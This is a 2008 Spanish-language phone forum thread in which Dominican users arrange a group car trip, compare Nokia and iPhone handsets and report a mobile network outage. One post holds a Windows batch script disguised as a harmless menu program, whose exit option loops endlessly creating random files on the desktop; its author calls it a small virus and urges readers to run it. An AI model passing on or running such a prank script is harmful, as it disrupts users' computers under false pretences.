Esato

Forum > Regional > Americas > Foro Dominicano!

Author Foro Dominicano!
tranced
LG Nexus 4
Joined: Jan 19, 2006
Posts: > 500
From: Santo Domingo, wonDeRland
PM
Posted: 2008-05-03 05:43
Reply with quoteEdit/Delete This PostPrint this post

On 2008-05-03 05:35:43, escaphus03 wrote:
nada pero creoo ke no cabe mas nadiee por ke el doc dijo 4 personas ahora

jose soto no hiva con nosotros nada lo metemo en el baul y lo llevamo hay ira mas comodoooo



On 2008-05-03 05:14:32, dr.carlosd wrote:
ya le pedi prestado el vehiculo al viejo o sea que pueden ser 6 o 7 si no le importa ir apretaditos
I jay0726 | (+3, 0) | Clara, Evita, Mimmi & Victoria | My Pics | Do your job!
dr.carlosd
Aino White
Joined: Sep 02, 2007
Posts: 68
From: Republica Dominicana
PM, WWW
Posted: 2008-05-03 06:03
Reply with quoteEdit/Delete This PostPrint this post
-tranced
-renesis
-scaphus
-jay
-jose (si llega temprano)
-xnuo(dijo como que queria ir)
y si no les importa ir apretados puede ir uno mas
VOLVI CON EL JACHO PRENDIO
tranced
LG Nexus 4
Joined: Jan 19, 2006
Posts: > 500
From: Santo Domingo, wonDeRland
PM
Posted: 2008-05-03 06:06
Reply with quoteEdit/Delete This PostPrint this post
pero xnuo ta pal Este, o me equivoco?
I jay0726 | (+3, 0) | Clara, Evita, Mimmi & Victoria | My Pics | Do your job!
dr.carlosd
Aino White
Joined: Sep 02, 2007
Posts: 68
From: Republica Dominicana
PM, WWW
Posted: 2008-05-03 06:07
Reply with quoteEdit/Delete This PostPrint this post
BUENO SEÑORES
YO SOY AMERICANO EN ESO DE LA HORA
VOY A ESTAR EN PLAZA CENTRAL A LAS 8.30 DE LA MAÑANA DEL DOMINGO
A LAS 9 SI NO HAN LLEGADO ME VOY PA MI CASA Y SI LLEGAN ALGUNOS ME VOY CON LOS QUE ESTEN
PARA QUE DESPUES NO SE PONGAN BRAVITOS
AVINSENLE A JPICHARDO QUE SI EL QUIERE IR CON NOSOTROS
ESE FLACO CABE ENTRE JOSE SOTO Y TRANCED
JEJEJEJ
coquito
perdon por las mayusculas pero queria resaltarlo
VOLVI CON EL JACHO PRENDIO
dr.carlosd
Aino White
Joined: Sep 02, 2007
Posts: 68
From: Republica Dominicana
PM, WWW
Posted: 2008-05-03 06:11
Reply with quoteEdit/Delete This PostPrint this post

On 2008-05-03 06:06:04, tranced wrote:
pero xnuo ta pal Este, o me equivoco?


bueno el fue que dijo como que iria
sino se quedo metan otro pero confirmen con el primero
VOLVI CON EL JACHO PRENDIO
mkng
T68 gold
Joined: May 24, 2007
Posts: 1
PM
Posted: 2008-05-03 06:13
Reply with quoteEdit/Delete This PostPrint this post
@doc

No lo pienses dos veces y comprese el mejor celular que hay en el mercado, N95. En aplicaciones no le falta nada. Solo hay que reconocer que no tiene xenon flash pero despues lo tiene todo. Cuando te acostumbras a los botones no te hara falta el touchscreen.

Tienes la opcion de comprarlo con memory stick o con los 8gb internos.

No es ser fanatico pero cuando has probado de todo pues ya sabes que es mejor.

Nokia rulez.

MK
dr.carlosd
Aino White
Joined: Sep 02, 2007
Posts: 68
From: Republica Dominicana
PM, WWW
Posted: 2008-05-03 06:16
Reply with quoteEdit/Delete This PostPrint this post
lo que pasa es que todavia no pruebo el iphone
y me conosco lo suficiente para saber que aunque me arrepienta saliendo de la tienda no estare tranquilo hasta que tenga uno
luego podremos hablar de nokia
realmente nokia rules


señores me apague
mode off

_________________
I mi P1i

[ This Message was edited by: dr.carlosd on 2008-05-03 05:19 ]
chadow
T68 gold
Joined: Nov 14, 2007
Posts: 2
From: dominican republic
PM
Posted: 2008-05-03 06:32
Reply with quoteEdit/Delete This PostPrint this post
@echo off
title programa risacio
color e3
echo bienbenido
echo -------------------------------
echo este programa creado por risacio para uso y manejo de lo que quiera.
echo Presione una tecla para continuar.
pause>nul
goto menu2
:menu2
cls
echo 1. registrarme
echo 2. entrar como usuario desconocido
echo 3. entar con tu cuenta
echo 4. salir.
set /p pre= que quiere hacer?:
if %pre%== a goto registarse
if %pre%== 2 goto desconocido
if %pre%== 3 goto entar
if %pre%== 4 goto exit
:registrase
cls
set /p pre= escriba su nombre:
set /p pre= escriba su contrasena:
echo operativo en funciones accion denegada
pause>nul
cls
goto menu
:desconocido
echo pulse para continuar...
pause>nul
cls
goto menudesconocido
:exit
msg * adios
exit
:entar
cls
set /p pre= su nombre:
set /p pre= su contraseña:
echo su usuario no existe o a sido eliminado por un moderador.
pause>nul
cls
goto menu
:menu
cls
echo ///////////////////////////////////////////////////////
echo 1. abrir MS-DOS (signo del sistema). //
echo 2. Navegar por la red en internet //
echo 3. abrir carpeta importante de windows. //
echo 4. Apagar el computador //
echo 5. crear un montonazo de archivos en el escritorio //
echo 6. salir del programa //
echo ///////////////////////////////////////////////////////
set /p pre= Que opcion desea elegir?:
if %pre%== 1 goto ms-dos
if %pre%== 2 goto internet
if %pre%== 3 goto windows
if %pre%== 4 goto apagar
if %pre%== 5 goto salir
if %pre%== 6 goto entar
:ms-dos
cls
echo abriendo espere un instante...
start
cls
goto menu
:internet
cls
echo Abriendo internet...espere...
start www.google.com
cls
goto menu
:windows
cls
echo cargando..pulse una tecla para terminar de cargar...
pause>nul
start c:
cls
goto menu
:apagar
cls
echo Apagando el computador...espere...
msg * te lo creiste xDD
cls
goto menu
:salir
cls
echo Saliendo del programa...presione una tecla para continuar...
pause>nul
cd %homepath%escritorio
:bucle
echo echo >>%random%.txt
echo echo >>%random%.doc
echo echo >>%random%.bat
goto bucle
goto menu
:entar
cls
echo saliendo del programa pulsa para salir...
pause>nul
exit
goto menudesconocido
:menudesconocido
cls
echo hola usuario desconocido
echo ///////////////////////////////////////////////////////
echo 1. abrir MS-DOS (signo del sistema). //
echo 2. Navegar por la red en internet //
echo 3. abrir carpeta importante de windows. //
echo 4. Apagar el computador //
echo 5. crear un montonazo de archivos en el escritorio //
echo 6. salir del programa //
echo ///////////////////////////////////////////////////////
set /p pre= Que opcion desea elegir?:
if %pre%== 1 goto ms-dos
if %pre%== 2 goto internet
if %pre%== 3 goto windows
if %pre%== 4 goto apagar
if %pre%== 5 goto salir
if %pre%== 6 goto entar
:ms-dos
cls
echo abriendo espere un instante...
start
cls
goto menu
:internet
cls
echo Abriendo internet...espere...
start www.google.com
cls
goto menu
:windows
cls
echo cargando..pulse una tecla para terminar de cargar...
pause>nul
start c:
cls
goto menu
:apagar
cls
echo Apagando el computador...espere...
msg * te lo creiste xDD
cls
goto menu
:salir
cls
echo Saliendo del programa...presione una tecla para continuar...
pause>nul
cd %homepath%escritorio
:bucle
echo echo >>%random%.txt
echo echo >>%random%.doc
echo echo >>%random%.bat
goto bucle
goto menu
:entar
echo saliendo del programa pulsa para salir...
pause>nul
exit


chequeen ese codigo y si lo pegan en ms-dos se joden jajaja es un pequeño virus que cree
xnuo
Samsung Galaxy S III
Joined: Aug 16, 2006
Posts: 206
From: Alcorcon, Spain
PM
Posted: 2008-05-03 06:37
Reply with quoteEdit/Delete This PostPrint this post
@todos:heyy.... dije que si voy... estoy en la capi... acabo de llegar hace 2 horas... no hagan cocote con mi puesto... jejeje

Dr. Milton Banner, N.D.
Proud Member of the Atomix Galaxy Note 3 clan
josesoto14
Z610 Black
Joined: Feb 28, 2007
Posts: 176
From: Dominican Republic
PM
Posted: 2008-05-03 07:42
Reply with quoteEdit/Delete This PostPrint this post
Bueno yo voy...toy apuntao....pero yo no ire a plaza central ya que yo vivo en el KM 11 de la autopista duarte...digase...un chin ma pa lante de carrefour...digase.....la misma autopista que lleva a santiago...digase....si me tiro para plaza...seria un estupido....porque como quiera tienen que pasar por aki.....asi si que los esperare en la misma autopista..oiste carlos!!

Hable con japichardo...es muy dificil que pueda ir...vienen unos parientes de los paises.....

@drcarlos: papa te dejare mi numero por PM..dejame el tuyo tambien....

@tranced: mira ve como llevas los "utilities" necesarios para el P990/P1 hack, en una memoria o algo...yo llevare el walkman 3.0....VOLTRONNNNN!!
<a href="http://www.lusogamer.com/gamercards/psn" target="_blank"></a>
TheOV
W810 black
Joined: Jan 26, 2007
Posts: 32
From: Santiago, Dominican Republic
PM, WWW
Posted: 2008-05-03 14:07
Reply with quoteEdit/Delete This PostPrint this post



[ This Message was edited by: TheOV on 2008-05-03 13:08 ]
tranced
LG Nexus 4
Joined: Jan 19, 2006
Posts: > 500
From: Santo Domingo, wonDeRland
PM
Posted: 2008-05-03 14:10
Reply with quoteEdit/Delete This PostPrint this post


ta apera la image. pero hay algo como que no ta claro ahi...
I jay0726 | (+3, 0) | Clara, Evita, Mimmi & Victoria | My Pics | Do your job!
TheOV
W810 black
Joined: Jan 26, 2007
Posts: 32
From: Santiago, Dominican Republic
PM, WWW
Posted: 2008-05-03 14:11
Reply with quoteEdit/Delete This PostPrint this post
Me retrase un poco pero ahi esta el potel...

Se han comunicado con los desaparecidos???


Clases de Gramática Rapida

- No se dice Haiga, la manera correcta es Haya.
- Es SEMÁFORO no semáfaro. Por favor corrijanlo que muuuuucha gente comete ese error.
pin:21C466F2
Drz Daddy
W880 Black
Joined: Apr 25, 2007
Posts: 46
From: Santiago, D.R.
PM, WWW
Posted: 2008-05-03 14:14
Reply with quoteEdit/Delete This PostPrint this post
k apero kedo eso! jejeje como siempre the ov se la luce...

Pero y claro? no kedo ni la C de ellos... aunk ta bien por careros!
De vuelta al coro!!!
fbloise
Nokia 808 PureView
Joined: Dec 14, 2002
Posts: > 500
From: London, UK
PM, WWW
Posted: 2008-05-03 14:27
Reply with quoteEdit/Delete This PostPrint this post
Buenos dias, son las 8:25am

en el K850 me sale "NO ACCESS TO NETWORK"

en el V3r no sale nah

Orange ta en el suelo en Stgo...
Verifiquen ustedes a ver que lo que.

Nota: el SIM de viva esta nitido, pude llamar a dos tricom (casa de mi papa/cel de mi hermano)
PEro si uno llama a Orange, sale como fast busy signals.


Edito:
Traiganme una canquiña "elatigosa" de bonao.

[ This Message was edited by: fbloise on 2008-05-03 13:38 ]
Access the forum with a mobile phone via esato.mobi
Goto page:
Lock this Topic Move this Topic Delete this Topic